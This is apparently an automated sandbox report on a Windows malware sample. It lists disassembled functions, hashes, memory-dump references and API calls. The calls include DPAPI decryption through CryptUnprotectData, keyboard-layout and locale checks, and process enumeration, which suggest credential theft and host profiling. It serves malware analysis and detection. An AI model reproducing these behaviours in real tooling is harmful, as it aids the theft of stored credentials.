                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 333070a6ddd4dd057799d72c289ae0243ad0819f49099b0f1fcf9f51fd090633
                          • Instruction ID: fcdb8d6c3ec802389560c2dc482b85ee3d07bb29f183830dcff6ae08f4c0710b
                          • Opcode Fuzzy Hash: 333070a6ddd4dd057799d72c289ae0243ad0819f49099b0f1fcf9f51fd090633
                          • Instruction Fuzzy Hash: 7E316D3156151A9BEB22EF68EC89ADE7FB6BF82700F005125F80597251CB74DC918F90
                          Function 008C5514 Relevance: 11.6, Strings: 8, Instructions: 1623COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $aw$9?V}$RyoM$Vs4$WR?$~r=$iO2$p[
                          • API String ID: 0-1032414269
                          • Opcode ID: ccdc44161f89472643b1584cf5ef1931211a8a4995da88b0269a4be9cfb29188
                          • Instruction ID: 0db2fa56ec4b640dfd81d50d75562c863f5e8fea5aad44442814748c9ced1f0a
                          • Opcode Fuzzy Hash: ccdc44161f89472643b1584cf5ef1931211a8a4995da88b0269a4be9cfb29188
                          • Instruction Fuzzy Hash: F2B206F3A082109FE304AE2DDC8566AFBE9EFD4720F1A493DE6C4D7344EA7558018697
                          Function 00532D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00532D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00532DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00532DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00532DEC
                          • LocalFree.KERNEL32(00000000), ref: 00532FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: b0bb47edc29d145cb250e17fe75cda1d32ace56b382b7b72030eea99d06daca9
                          • Instruction ID: f1fe8c7972f06448212002de7fd57e68d4506d34a3fc8d27d4a57fba0ebacb39
                          • Opcode Fuzzy Hash: b0bb47edc29d145cb250e17fe75cda1d32ace56b382b7b72030eea99d06daca9
                          • Instruction Fuzzy Hash: A1B13D74904609CFD715CF18C949BA9BBF5FF44325F29C1AAD4089B2A6D7769C82CF80
                          Function 008CC1E3 Relevance: 9.2, Strings: 6, Instructions: 1744COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #9m]$#9m]$'Uz?$Lxo$xC_W$H|
                          • API String ID: 0-3479744152
                          • Opcode ID: 61c2cbc60ad5f4acf7e0d327c49fd6b35eb3de96ced2c0dea614992bfbccda1b
                          • Instruction ID: 63281005f5a34e5d4a17a72e9e353b45b99f30779520ba364f51bf2a2e36fdd7
                          • Opcode Fuzzy Hash: 61c2cbc60ad5f4acf7e0d327c49fd6b35eb3de96ced2c0dea614992bfbccda1b
                          • Instruction Fuzzy Hash: 7AB24BF36082049FE304AE2DEC8567AFBEAEFD4720F1A853DE6C4C7744E93558058696
                          Function 00532C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00532C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00532C58
                          • wsprintfA.USER32 ref: 00532C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: 5b2d711874c0f7e61e3a0caaa90f33db8b344ceffeec031b958c6bdbae86e5a8
                          • Instruction ID: 2363dd8ecab91be80987e608d9dc67a6eedf09fc66a1f7c4be1a9849deefdc42
                          • Opcode Fuzzy Hash: 5b2d711874c0f7e61e3a0caaa90f33db8b344ceffeec031b958c6bdbae86e5a8
                          • Instruction Fuzzy Hash: B8012B75A00604ABD7188F58DC4AFAEBB6DEB85721F00832AF915D77D0D7741D0486D5
                          Function 008D142C Relevance: 7.9, Strings: 5, Instructions: 1647COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /*{$8o>$PY;$X%y3$b9Bu
                          • API String ID: 0-2722733600
                          • Opcode ID: 8df73b603e845da6a2223b3103fbca0ac9ecd2eb80071b1e7d96c34dac97c1f7
                          • Instruction ID: 59c09b2178a188cf2b313484e41a8daa5593b30cdae8b480403ceda72e4c76f8
                          • Opcode Fuzzy Hash: 8df73b603e845da6a2223b3103fbca0ac9ecd2eb80071b1e7d96c34dac97c1f7
                          • Instruction Fuzzy Hash: 00B23CF36082049FE304AE2DEC8567AF7E9EFD4720F1A463DE6C4C7744EA3558058696
                          Function 008D2F40 Relevance: 7.9, Strings: 5, Instructions: 1607COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7^yl$A]w'$D5o$aR>;$u"w
                          • API String ID: 0-1063973768
                          • Opcode ID: 32f8f6c0b9ba4cc1095f058c376bed10784ff9d71e2c0691e6a9ba4b3fa4b811
                          • Instruction ID: 5ba5a6eed3c671e49b5e6d7a7f1695a0691b398512e65d066249751940e52c05
                          • Opcode Fuzzy Hash: 32f8f6c0b9ba4cc1095f058c376bed10784ff9d71e2c0691e6a9ba4b3fa4b811
                          • Instruction Fuzzy Hash: 22B2F7F36082049FE304AE2DEC8566AFBE6EFD4720F1A853DE6C4C7744EA3558058697
                          Function 008CF93B Relevance: 7.8, Strings: 5, Instructions: 1599COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !G{m$-i{$0Ru*$d~}$kgfS
                          • API String ID: 0-2482825174
                          • Opcode ID: 28684469c9fc0870c20af3c31c22ae230f08c1c64cf6e4cf268f80c6896220f7
                          • Instruction ID: 23af3014a75d44bb4378ee37f7c732fe7042e80497d5d2167079ebca104d5e02
                          • Opcode Fuzzy Hash: 28684469c9fc0870c20af3c31c22ae230f08c1c64cf6e4cf268f80c6896220f7
                          • Instruction Fuzzy Hash: 5EB2F8F3A082049FE304AE2DED4567AFBE5EFD4720F16493DEAC4C3744EA3598058696
                          Function 00517750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0051775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00517765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0051778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005177AD
                          • LocalFree.KERNEL32(?), ref: 005177B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 6b463255ba6aefeeb7da30276f4500c229b84ac46030cda0bb9942281464685a
                          • Instruction ID: 306c69a5da7a0ad975a20a24809b77c17846e39ebde890f3740306a5f66383cf
                          • Opcode Fuzzy Hash: 6b463255ba6aefeeb7da30276f4500c229b84ac46030cda0bb9942281464685a
                          • Instruction Fuzzy Hash: EE011275B403097BEB10DB949C4AFAA7B78EB45B11F108155FB05EB2D0D7B499008794
                          Function 008D65CC Relevance: 6.6, Strings: 4, Instructions: 1611COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (N;u$:euo$IK6$cD|U
                          • API String ID: 0-915228505
                          • Opcode ID: eb227b47417d0e4ab9ef06ebcc6fc350493c4e1e18eb908d5837d0ad3fe9c46f
                          • Instruction ID: 03ff780d8ca6d3f41e1918dc733b1ac4aa36d52924b7484b9061920795acc85c
                          • Opcode Fuzzy Hash: eb227b47417d0e4ab9ef06ebcc6fc350493c4e1e18eb908d5837d0ad3fe9c46f
                          • Instruction Fuzzy Hash: 28B219F3A082009FE714AE2DEC8577ABBE9EF94320F1A453DEAC4C7744E63558058796
                          Function 008CE1BC Relevance: 6.3, Strings: 4, Instructions: 1326COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *vV$4>{$c~>$nAo
                          • API String ID: 0-2494399842
                          • Opcode ID: 16521f8bda2e7d2884d5d8ca6af63946485e54b86b224cfa357f164a50f551c8
                          • Instruction ID: 2fda3161433cad0d942c340d6f9666903fde48e76d1e30f42369597ac9581c8d
                          • Opcode Fuzzy Hash: 16521f8bda2e7d2884d5d8ca6af63946485e54b86b224cfa357f164a50f551c8
                          • Instruction Fuzzy Hash: B2921BF360C2049FE304AE2DEC8567ABBE9EFD4720F1A852DE6C5C3744E93598058697
                          Function 00533A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00533A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00533AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00533ABF
                            • Part of subcall function 00537310: lstrlen.KERNEL32(------,00515BEB), ref: 0053731B
                            • Part of subcall function 00537310: lstrcpy.KERNEL32(00000000), ref: 0053733F
                            • Part of subcall function 00537310: lstrcat.KERNEL32(?,------), ref: 00537349
                            • Part of subcall function 00537280: lstrcpy.KERNEL32(00000000), ref: 005372AE
                          • CloseHandle.KERNEL32(00000000), ref: 00533BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
